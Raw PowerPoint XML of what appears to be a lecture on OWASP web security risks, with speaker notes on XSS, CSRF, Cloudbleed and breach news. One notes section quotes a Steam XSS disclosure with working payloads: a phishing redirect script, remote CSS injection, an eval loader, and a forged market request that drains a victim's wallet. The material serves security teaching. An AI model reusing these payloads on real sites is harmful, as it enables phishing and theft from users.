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 id="2147483714" r:id="rId2"/>
    <p:sldMasterId id="2147483715" r:id="rId3"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId75"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId4"/>
    <p:sldId id="302" r:id="rId5"/>
    <p:sldId id="303" r:id="rId6"/>
    <p:sldId id="304"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330" r:id="rId25"/>
    <p:sldId id="336" r:id="rId26"/>
    <p:sldId id="331" r:id="rId27"/>
    <p:sldId id="274" r:id="rId28"/>
    <p:sldId id="275" r:id="rId29"/>
    <p:sldId id="276" r:id="rId30"/>
    <p:sldId id="277" r:id="rId31"/>
    <p:sldId id="284" r:id="rId32"/>
    <p:sldId id="319" r:id="rId33"/>
    <p:sldId id="320" r:id="rId34"/>
    <p:sldId id="321" r:id="rId35"/>
    <p:sldId id="322" r:id="rId36"/>
    <p:sldId id="318" r:id="rId37"/>
    <p:sldId id="278" r:id="rId38"/>
    <p:sldId id="279" r:id="rId39"/>
    <p:sldId id="280" r:id="rId40"/>
    <p:sldId id="326" r:id="rId41"/>
    <p:sldId id="332" r:id="rId42"/>
    <p:sldId id="327" r:id="rId43"/>
    <p:sldId id="337" r:id="rId44"/>
    <p:sldId id="333" r:id="rId45"/>
    <p:sldId id="328" r:id="rId46"/>
    <p:sldId id="334" r:id="rId47"/>
    <p:sldId id="338" r:id="rId48"/>
    <p:sldId id="329" r:id="rId49"/>
    <p:sldId id="335" r:id="rId50"/>
    <p:sldId id="339" r:id="rId51"/>
    <p:sldId id="282" r:id="rId52"/>
    <p:sldId id="324" r:id="rId53"/>
    <p:sldId id="285" r:id="rId54"/>
    <p:sldId id="286" r:id="rId55"/>
    <p:sldId id="287" r:id="rId56"/>
    <p:sldId id="288" r:id="rId57"/>
    <p:sldId id="289" r:id="rId58"/>
    <p:sldId id="293" r:id="rId59"/>
    <p:sldId id="294" r:id="rId60"/>
    <p:sldId id="295" r:id="rId61"/>
    <p:sldId id="296" r:id="rId62"/>
    <p:sldId id="297" r:id="rId63"/>
    <p:sldId id="298" r:id="rId64"/>
    <p:sldId id="325" r:id="rId65"/>
    <p:sldId id="300" r:id="rId66"/>
    <p:sldId id="340" r:id="rId67"/>
    <p:sldId id="343" r:id="rId68"/>
    <p:sldId id="344" r:id="rId69"/>
    <p:sldId id="314" r:id="rId70"/>
    <p:sldId id="342" r:id="rId71"/>
    <p:sldId id="301" r:id="rId72"/>
    <p:sldId id="345" r:id="rId73"/>
    <p:sldId id="341" r:id="rId74"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId76"/>
      <p:bold r:id="rId77"/>
      <p:italic r:id="rId78"/>
      <p:boldItalic r:id="rId79"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId80"/>
      <p:bold r:id="rId81"/>
      <p:italic r:id="rId82"/>
      <p:boldItalic r:id="rId83"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Malgun Gothic" panose="020B0503020000020004" pitchFamily="34" charset="-127"/>
      <p:regular r:id="rId84"/>
      <p:bold r:id="rId85"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Montserrat" panose="02000505000000020004" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId86"/>
      <p:bold r:id="rId87"/>
      <p:italic r:id="rId88"/>
      <p:boldItalic r:id="rId89"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Lora"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Quan Heng Lim"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400DB73D-3CC1-440A-AC61-E1A12801EA14}">
  <a:tblStyle styleId="{400DB73D-3CC1-440A-AC61-E1A12801EA14}"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85" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="82" d="100"/>
          <a:sy n="82" d="100"/>
        </p:scale>
        <p:origin x="147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font" Target="fonts/font18.fntdata"/><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commentAuthors" Target="commentAuthors.xml"/><Relationship Id="rId9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7-19T12:03:35.050" idx="1">
    <p:pos x="6000" y="0"/>
    <p:text>Gizmodo.com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ko" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko"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ugs.chromium.org/p/project-zero/issues/detail?id=1139"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360" name="Shape 36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10</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7" name="Shape 36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68" name="Shape 36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11</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ko"/>
              <a:t>Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities (temporarily or permanently). </a:t>
            </a:r>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0" name="Shape 38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https://www.databreaches.net/sc-3-6-million-social-security-numbers-stolen-from-state-department-of-revenue/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="381" name="Shape 38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13</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7" name="Shape 38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https://www.wired.com/2016/02/irs-hack-700000-accounts/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388" name="Shape 38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14</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ko"/>
              <a:t>XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0" name="Shape 40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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>https://thenextweb.com/security/2017/02/07/someone-just-discovered-serious-security-vulnerability-steam-profiles/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Redirecting a user to a website to phish their login.</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My first example was to demonstrate that it would be simple to redirect a user to a phishing website in order to gain their login credentials.</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1) Create a guide, use the title: &lt;script&gt;window.location = "[PHISHING_SITE_URL]";&lt;/script&gt; This will redirect the user to [PHISHING_SITE_URL] when they view your profile. 2) Have a website ready with a fake login page, users will be redirected here. 3) When a user visits your profile, it will redirect to a login. Because they were viewing a legitimate Steam page they are extremely likely to not notice the phishing attempt and input their information.</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Utilizing CSS trickery to change your profile to trick users.</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Say you wanted to impersonate someone to steal items, or appear as if you're a Valve employee, or a Steam Moderator? You can do so relatively simply.</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1) Create a guide, use the title: &lt;link rel="text/stylesheet" href="[YOUR_REMOTE_CSS_FILE]/&gt;"</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This will load the CSS in the URL provided, and due to cascading rules it will generally overrule anything you are attempting to change. As an example, here is what I did (Harmlessly, bear in mind this could be used to change literally anything on the page) to my profile to demonstrate: https://puu.sh/tTvMX/a1f6a9fbd4.png</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Loading larger payloads</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Obviously the 128*4 character limit will be a problem for larger exploits, thus you can bypass this with some trickery and have enough room to do whatever you want.</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1) Create a guide with the following title: &lt;script&gt;$J(function(){eval($J(".showcase_notes").text());});&lt;/script&gt; This is telling the browser to get the text content of your "Custom Text" showcase, and evaluate it as if it's proper JavaScript. This showcase has a massive character limit, permitting free reign.</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Silently draining your Steam Wallet funds.</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Because you're already logged in, this exploit could be used to perform actions AS YOU. Steam Community Market purchases do not require Steam Guard verification, so you could maliciously drain any user's funds by having them visit your page. What this code does is create a silent buy order for as many of the Anarchist trading card as possible, this card is the highest quantity and cheapest. This card is $0.08, but has such a massive quantity it will buy as many as possible until your funds are depleted.</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1) Utilize the larger payload method above to have more room to write injected code. 2) In your custom info showcase use the following code: var g_Currency = 1; $.post('https://steamcommunity.com/market/createbuyorder/', {"sessionid": g_SessionID, "currency": g_Currency, "appid": 753, "market_hash_name": "730-Anarchist", "price_total": 9999, "quantity": 99999}, function(json) {});</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="ko" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ko" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Spreading Malware via an auto-download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="Shape 40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16</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ko"/>
              <a:t>Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users’ data, change access rights, etc. </a:t>
            </a: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414" name="Shape 41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18</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ko"/>
              <a:t>Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, platform, etc. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Shape 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0160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6" name="Shape 42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427" name="Shape 42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20</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4" name="Shape 43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435" name="Shape 43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21</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4" name="Shape 43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435" name="Shape 43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22</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5858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4" name="Shape 43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435" name="Shape 43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23</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9729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4" name="Shape 43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GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Security misconfiguration can range from something as simple as allowing excessive permissions to a user account, to failing to restrict resource access to external addresses. In the cases mentioned above, they were caused by misconfiguration of the passwords protecting the systems.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="Shape 43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24</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4556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ko"/>
              <a:t>Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, platform, etc. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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6" name="Shape 44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447" name="Shape 44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26</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456" name="Shape 45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27</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3" name="Shape 4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464" name="Shape 46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28</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635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60" name="Shape 36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30</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9222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60" name="Shape 36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31</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1545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60" name="Shape 36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32</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2147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60" name="Shape 36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33</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3720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Shape 6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ko"/>
              <a:t>Say things like so who thinks Windows is the most insecure OS, or is it MacOS? Linux?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko"/>
              <a:t>Ask Questions like how many here has a android phone, uses OSX.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>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9278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ko"/>
              <a:t>Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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5" name="Shape 47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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Summary: It was possible to get Cloudflare’s CDN to show you information from other customer’s requests, due to the way it mishandles HTML tags. Requests could contain anything from authentication keys to passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="444444"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="444444"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="444444"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Google security researcher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8E9F43"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Tavis Ormandy revealed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> that he found a buffer overflow bug on Cloudflare services that made some HTML pages hosted behind the company's CDN respond to page requests with random bits of data. Pages with a specific combination of unbalanced html tags triggered the issue.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The specific HTML flaw was that the page had to end with an unterminated attribute. In other words, something like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EAEAEA"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>&lt;IMG HEIGHT="50px" WIDTH="200px" SRC="</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ko" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EAEAEA"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="ko" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EAEAEA"/>
              </a:highlight>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>When a page for a particular customer is being parsed it is stored in memory on one of the servers that is a part of our infrastructure. Contents of the other customers' requests are also in adjacent portions of memory on Cloudflare's servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The bug caused the parser, when it encountered unterminated attribute at the end of a page, to not stop when it reached the end of the portion of memory for the particular page being parsed. Instead, the parser continued to read from adjacent memory, which contained data from other customers' requests. The contents of that adjacent memory was then dumped onto the page with the flawed HTML.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1100" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1100" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1100" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="476" name="Shape 476"/>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36</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https://blog.cloudflare.com/quantifying-the-impact-of-cloudbleed/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="Shape 48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37</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ko"/>
              <a:t>Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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955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https://blog.cloudflare.com/quantifying-the-impact-of-cloudbleed/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="Shape 48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39</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1087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0990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sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.</a:t>
            </a:r>
            <a:endParaRPr lang="ko" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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391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ko" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="Shape 48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41</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066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ko" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="Shape 48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42</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3479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ko" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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5081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https://blog.cloudflare.com/quantifying-the-impact-of-cloudbleed/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="Shape 48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44</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9954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ko"/>
              <a:t>Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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3440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82" name="Shape 4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https://blog.cloudflare.com/quantifying-the-impact-of-cloudbleed/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="Shape 48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47</a:t>
            </a:fld>
            <a:endParaRPr lang="k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90011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ko" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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91341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96" name="Shape 496"/>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ltLang="ko"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="ko"/>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2371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7" name="Shape 51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https://www.owasp.org/index.php/OWASP_Secure_Application_Design_Project</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="Shape 51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51</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7" name="Shape 52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https://www.owasp.org/index.php/OWASP_Secure_Application_Design_Project</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="528" name="Shape 52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52</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7" name="Shape 53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38" name="Shape 53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53</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9" name="Shape 54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50" name="Shape 55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54</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Shape 5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559" name="Shape 5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ko"/>
              <a:t>Say things like so who thinks Windows is the most insecure OS, or is it MacOS? Linux?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko"/>
              <a:t>Ask Questions like how many here has a android phone, uses OSX.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>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4" name="Shape 59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95" name="Shape 595"/>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57</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6" name="Shape 606"/>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1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="607" name="Shape 607"/>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59</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3" name="Shape 61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lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" b="1"/>
              <a:t>https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="614" name="Shape 61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60</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rgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko"/>
              <a:t>Cyber security: protection of data storage and communication</a:t>
            </a:r>
          </a:p>
          <a:p>
